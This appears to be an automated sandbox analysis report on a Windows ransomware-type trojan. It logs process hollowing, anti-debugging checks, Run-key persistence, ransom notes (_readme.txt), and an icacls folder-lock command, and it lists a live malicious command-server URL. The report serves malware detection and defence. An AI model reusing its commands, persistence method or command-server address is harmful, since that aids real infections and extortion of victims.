Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: davclnt.dll
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: davhlpr.dll
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: browcli.dll
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Section loaded: netapi32.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: file.exe, file.exe, 00000004.00000002.2105284111.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000006.00000002.1978697322.0000000002230000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000007.00000002.1892636740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, file.exe, 0000000A.00000002.2056958884.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, file.exe, 0000000B.00000002.1992636135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, file.exe, 0000000C.00000002.2066559473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, file.exe, 0000000D.00000002.2936140866.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: file.exe, 00000000.00000002.1752226229.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, file.exe, 00000003.00000002.1883209457.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000004.00000002.2105284111.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000006.00000002.1978697322.0000000002230000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000007.00000002.1892636740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, file.exe, 0000000A.00000002.2056958884.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, file.exe, 0000000B.00000002.1992636135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, file.exe, 0000000C.00000002.2066559473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, file.exe, 0000000D.00000002.2936140866.0000000000400000.00000040.00000400.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 1.2.file.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 7.2.file.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Unpacked PE file: 11.2.file.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Unpacked PE file: 12.2.file.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Unpacked PE file: 13.2.file.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 1.2.file.exe.400000.0.unpack
Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 7.2.file.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Unpacked PE file: 11.2.file.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Unpacked PE file: 12.2.file.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Unpacked PE file: 13.2.file.exe.400000.0.unpack

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004077CE LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,

0_2_004077CE

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00403281 push ecx; ret	0_2_00403294
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_021100AF push ecx; retf	0_2_021100B2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_021C8F05 push ecx; ret	0_2_021C8F18
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00428565 push ecx; ret	1_2_00428578
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00403281 push ecx; ret	3_2_00403294
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_0217A0AF push ecx; retf	3_2_0217A0B2
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_02318F05 push ecx; ret	3_2_02318F18
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Code function: 4_2_0214B0AF push ecx; retf	4_2_0214B0B2
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Code function: 4_2_02208F05 push ecx; ret	4_2_02208F18

Source: file.exe	Static PE information: section name: .text entropy: 7.733615032334482
Source: file.exe.1.dr	Static PE information: section name: .text entropy: 7.733615032334482

Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	File created: C:\Users\user\Desktop\file.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	File created: C:\Users\user\Desktop\file.exe.watz (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	File created: C:\_readme.txt			Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	File created: C:\Users\user\_readme.txt			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelper			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelper			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00481920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,

1_2_00481920

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c" /deny *S-1-1-0:(OI)(CI)(DE,DC)

Source: C:\Users\user\Desktop\file.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0210E71C rdtsc

0_2_0210E71C

Source: C:\Users\user\Desktop\file.exe

Code function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,

1_2_0040E670

Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\file.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\file.exe.watz (copy)			Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

graph_1-39067

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004A7829 GetSystemTimes followed by cmp: cmp dword ptr [004bb094h], 0ah and CTI: jne 004A79F2h		0_2_004A7829
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_004A7829 GetSystemTimes followed by cmp: cmp dword ptr [004bb094h], 0ah and CTI: jne 004A79F2h		3_2_004A7829

Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,	1_2_00410160
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,	1_2_0040F730
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,	1_2_0040FB98

Source: C:\Users\user\Desktop\file.exe

0_2_004A7829

Source: file.exe, 00000001.00000002.1765596117.0000000000744000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1765596117.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000002.1894667109.00000000006A6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000002.1894667109.0000000000702000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000B.00000003.1992047966.0000000000962000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000B.00000002.1993113775.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000B.00000002.1993113775.0000000000962000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000003.2065520432.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000002.2066911919.0000000000868000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000002.2066911919.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000D.00000002.2936387316.0000000000828000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 0000000B.00000003.1992047966.0000000000962000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000B.00000002.1993113775.0000000000962000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWi
Source: file.exe, 0000000C.00000003.2065520432.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000002.2066911919.00000000008F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW[H

Source: C:\Users\user\Desktop\file.exe

API call chain: ExitProcess graph end node

graph_1-39069

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0210E71C rdtsc

0_2_0210E71C

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00401006 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_00401006

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_0042A57A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

1_2_0042A57A

Source: C:\Users\user\Desktop\file.exe

0_2_004077CE

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0210D0A3 push dword ptr fs:[00000030h]	0_2_0210D0A3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_021A0042 push dword ptr fs:[00000030h]	0_2_021A0042
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_021770A3 push dword ptr fs:[00000030h]	3_2_021770A3
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_022F0042 push dword ptr fs:[00000030h]	3_2_022F0042
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Code function: 4_2_021480A3 push dword ptr fs:[00000030h]	4_2_021480A3
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Code function: 4_2_021E0042 push dword ptr fs:[00000030h]	4_2_021E0042

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_004278D5 GetProcessHeap,

1_2_004278D5

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00403E01 SetUnhandledExceptionFilter,	0_2_00403E01
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401006 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00401006
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004095A7 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_004095A7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004023BD _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_004023BD
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_004329EC
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_004329BB SetUnhandledExceptionFilter,	1_2_004329BB
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00403E01 SetUnhandledExceptionFilter,	3_2_00403E01
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_00401006 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00401006
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_004095A7 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_004095A7
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_004023BD _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_004023BD

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_021A0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,

0_2_021A0110

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Users\user\Desktop\file.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Users\user\Desktop\file.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Memory written: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Memory written: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Memory written: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe base: 400000 value starts with: 4D5A	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,

1_2_00419F90

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe" --Admin IsNotAutoStart IsNotTask	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe" --Admin IsNotAutoStart IsNotTask	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Process created: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe --Task	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Process created: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe "C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe" --AutoStart	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Process created: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe "C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe" --AutoStart	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_021C80F6 cpuid

0_2_021C80F6

Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoA,	0_2_004097AD
Source: C:\Users\user\Desktop\file.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_2_021E0AB6
Source: C:\Users\user\Desktop\file.exe	Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,	1_2_00438178
Source: C:\Users\user\Desktop\file.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	1_2_00440116
Source: C:\Users\user\Desktop\file.exe	Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,	1_2_004382A2
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,	1_2_0043834F
Source: C:\Users\user\Desktop\file.exe	Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,	1_2_00438423
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	1_2_004387C8
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	1_2_0043884E
Source: C:\Users\user\Desktop\file.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,	1_2_00437BB3
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	1_2_00437E27
Source: C:\Users\user\Desktop\file.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	1_2_00437E83
Source: C:\Users\user\Desktop\file.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	1_2_00437F00
Source: C:\Users\user\Desktop\file.exe	Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,	1_2_00437F83
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoA,	3_2_004097AD
Source: C:\Users\user\Desktop\file.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	3_2_02330AB6
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	4_2_02220AB6

Source: C:\Users\user\Desktop\file.exe

0_2_004A7829

Source: C:\Users\user\Desktop\file.exe

1_2_00419F90

Source: C:\Users\user\Desktop\file.exe

0_2_004A7829

Source: C:\Users\user\Desktop\file.exe

1_2_00419F90

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Deobfuscate/Decode Files or Information	OS Credential Dumping	12 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	2 Data Encrypted for Impact
Credentials	Domains	Default Accounts	3 Command and Scripting Interpreter	1 Registry Run Keys / Startup Folder	1 DLL Side-Loading	3 Obfuscated Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 Services File Permissions Weakness	211 Process Injection	22 Software Packing	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Registry Run Keys / Startup Folder	1 DLL Side-Loading	NTDS	24 System Information Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 Services File Permissions Weakness	1 Masquerading	LSA Secrets	141 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	211 Process Injection	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Services File Permissions Weakness	DCSync	1 System Owner/User Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
file.exe	80%	Virustotal		Browse
file.exe	100%	ReversingLabs	Win32.Trojan.Privateloader
file.exe	100%	Avira	HEUR/AGEN.1318094
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	100%	Avira	HEUR/AGEN.1318094
C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	87%	ReversingLabs	Win32.Trojan.Privateloader

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.nytimes.com/	0%	URL Reputation	safe
http://www.amazon.com/	0%	URL Reputation	safe
http://www.twitter.com/	0%	URL Reputation	safe
http://www.openssl.org/support/faq.html	0%	URL Reputation	safe
http://www.youtube.com/	0%	URL Reputation	safe
http://www.wikipedia.com/	0%	URL Reputation	safe
http://www.reddit.com/	0%	URL Reputation	safe
https://api.2ip.ua/geo.jsondVz	0%	Avira URL Cloud	safe
https://api.2ip.ua/geo.jsonZ	0%	Avira URL Cloud	safe
http://cajgtus.com/test1/get.php	100%	Avira URL Cloud	malware
https://api.2ip.ua/	0%	Avira URL Cloud	safe
https://api.2ip.ua/geo.jsonVh	0%	Avira URL Cloud	safe
http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error	0%	Avira URL Cloud	safe
https://api.2ip.ua/geo.jsony	0%	Avira URL Cloud	safe
https://api.2ip.ua/geo.json%	0%	Avira URL Cloud	safe
https://api.2ip.ua/X	0%	Avira URL Cloud	safe
https://api.2ip.ua/geo.json	0%	Avira URL Cloud	safe
https://api.2ip.ua/A	0%	Avira URL Cloud	safe
https://api.2ip.ua/geo.json5	0%	Avira URL Cloud	safe
http://cajgtus.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637	100%	Avira URL Cloud	malware
https://api.2ip.ua/geo.jsont	0%	Avira URL Cloud	safe
https://api.2ip.ua/geo.json3	0%	Avira URL Cloud	safe
https://api.2ip.ua/geo.jsons	0%	Avira URL Cloud	safe
http://cajgtus.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637Q	100%	Avira URL Cloud	malware
http://www.live.com/	0%	Avira URL Cloud	safe
https://api.2ip.ua/geo.jsonN	0%	Avira URL Cloud	safe
https://api.2ip.ua/geo.jsonG	0%	Avira URL Cloud	safe
https://api.2ip.ua/7	0%	Avira URL Cloud	safe
https://wetransfer.com/downloads/abe121434ad837dd5bdd03878a14485820240531135509/34284d	0%	Avira URL Cloud	safe
http://www.google.com/	0%	Avira URL Cloud	safe
https://api.2ip.ua/9	0%	Avira URL Cloud	safe
https://api.2ip.ua/EQ	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cajgtus.com	58.151.148.90	true	true		unknown
api.2ip.ua	188.114.97.3	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://cajgtus.com/test1/get.php	true	Avira URL Cloud: malware	unknown
https://api.2ip.ua/geo.json	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.nytimes.com/	file.exe, 0000000D.00000003.2178383773.0000000003570000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
